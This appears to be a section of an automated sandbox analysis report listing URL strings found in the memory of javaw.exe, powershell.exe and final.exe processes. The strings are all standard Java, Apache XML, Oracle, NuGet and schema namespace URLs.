Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/input-buffer-size
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factoryDocu:
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner/w3c/d7
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor/5
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scannerm/l8
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager8
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver(
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-handler
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter:
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver:
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation-managersetBF
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factoryam7
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtde:
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validator/schema
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/localedJ
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocationetPubl?
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocationdK
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/security-manager
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/security-manager7
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declarationsion
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definitionr(
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/w3c/domD
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes
Source: javaw.exe, 0000000C.00000002.3911788928.00000000099DA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: powershell.exe, 00000009.00000002.1820608682.00000254137BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://github.com
Source: powershell.exe, 00000009.00000002.2345146264.000002542A31C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ion=4.0.0.0
Source: final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: javaw.exe, 0000000C.00000002.3911788928.00000000099DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/jaxp/xpath/dom
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/(
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage4
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/schema/features/
Source: javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B06000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-stateml.FXML
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
Source: javaw.exe, 0000000C.00000002.3911788928.0000000009DFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javafx.com/fxml
Source: javaw.exe, 0000000C.00000002.3911788928.0000000009DFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javafx.com/fxml/1
Source: javaw.exe, 0000000C.00000002.3911788928.0000000009DFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javafx.com/javafx/8
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing8
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/$
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD?
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchemaD
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet0
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.dom.DOMResult/feature0
Source: javaw.exe, 0000000C.00000002.3911788928.000000000A244000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.dom.DOMSource/feature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.dom.DOMSource/feature0
Source: javaw.exe, 0000000C.00000002.3911788928.000000000A2E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.dom.DOMSource/featureK;)
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.sax.SAXResult/feature0
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.sax.SAXSource/feature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature/xmlfilter
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.stax.StAXResult/feature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.stax.StAXSource/feature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.stream.StreamResult/feature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.stream.StreamSource/feature
Source: powershell.exe, 00000009.00000002.2284762070.0000025422240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2284762070.0000025422383000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.1820608682.0000025412402000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.2580860064.0000020D95667000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1628873409.000002208E587000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820608682.00000254121D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.1820608682.0000025412402000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/feature/use-service-mechanismX
Source: javaw.exe, 0000000C.00000002.3911788928.000000000A244000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.html
Source: javaw.exe, 0000000C.00000002.3911788928.000000000A2E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.html#J)
Source: javaw.exe, 0000000C.00000003.2693175888.0000000018CD2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.2681083567.0000000018CCA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588459835.0000000018CB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.htmlP
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/is-standalone
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/is-standalone.
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/;
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/XmlFeatureManager
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/enableExtensionFunctions
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit9
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepthx
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
Source: javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
Source: javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.apache.org/xalan
Source: javaw.exe, 0000000C.00000002.3911788928.000000000A244000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3930308260.0000000018C74000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588459835.0000000018C6D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.2681083567.0000000018C6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-stripping
Source: javaw.exe, 0000000C.00000002.3911788928.000000000A2E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-stripping;
